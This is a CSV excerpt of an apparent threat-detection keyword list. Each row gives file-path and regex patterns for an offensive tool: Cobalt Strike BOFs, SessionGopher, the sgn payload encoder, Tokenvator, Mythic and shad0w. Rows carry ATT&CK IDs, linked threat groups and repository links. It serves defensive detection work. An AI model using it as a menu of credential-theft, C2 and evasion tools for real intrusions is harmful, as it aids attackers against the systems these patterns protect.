"*/servers/smb_server.py*",".{0,1000}\/servers\/smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","10793"
"*/serverscan/CobaltStrike*",".{0,1000}\/serverscan\/CobaltStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10794"
"*/serverscan_Air*",".{0,1000}\/serverscan_Air.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10795"
"*/serverscan_pro*",".{0,1000}\/serverscan_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10796"
"*/ServerScanForLinux/*",".{0,1000}\/ServerScanForLinux\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","#linux","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10797"
"*/ServerScanForWindows/*",".{0,1000}\/ServerScanForWindows\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10798"
"*/ServerScanForWindows/PE*",".{0,1000}\/ServerScanForWindows\/PE.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10799"
"*/ServiceMove-BOF/*",".{0,1000}\/ServiceMove\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","10800"
"*/ServiceName:TokenDriver*",".{0,1000}\/ServiceName\:TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","10801"
"*/Services/TransitEXE.exe*",".{0,1000}\/Services\/TransitEXE\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","10802"
"*/servicetags.nse*",".{0,1000}\/servicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10803"
"*/SessionExec.exe*",".{0,1000}\/SessionExec\.exe.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","1","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","10804"
"*/SessionGopher.git*",".{0,1000}\/SessionGopher\.git.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","10805"
"*/SessionGopher.ps1*",".{0,1000}\/SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10806"
"*/SessionGopher.ps1*",".{0,1000}\/SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","10807"
"*/SessionSearcher.exe*",".{0,1000}\/SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10808"
"*/SessionSearcher.exe*",".{0,1000}\/SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","10809"
"*/SetNTLM.ps1*",".{0,1000}\/SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","10812"
"*/SetProcessInjection.git*",".{0,1000}\/SetProcessInjection\.git.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","10813"
"*/setuserpass.x64.*",".{0,1000}\/setuserpass\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10815"
"*/setuserpass.x86.*",".{0,1000}\/setuserpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10816"
"*/sfp_openphish.py*",".{0,1000}\/sfp_openphish\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","10817"
"*/sfp_spider.py*",".{0,1000}\/sfp_spider\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","10818"
"*/sgn_linux-amd64.zip*",".{0,1000}\/sgn_linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10822"
"*/sgn_linux-arm64.zip*",".{0,1000}\/sgn_linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10823"
"*/sgn_windows-amd64.exe*",".{0,1000}\/sgn_windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10824"
"*/sgn_windows-amd64.zip*",".{0,1000}\/sgn_windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10825"
"*/sgn32.exe*",".{0,1000}\/sgn32\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10826"
"*/sh_executor/*.go*",".{0,1000}\/sh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","10827"
"*/s-h-3-l-l/*",".{0,1000}\/s\-h\-3\-l\-l\/.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","10828"
"*/shad0w.deb*",".{0,1000}\/shad0w\.deb.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10829"
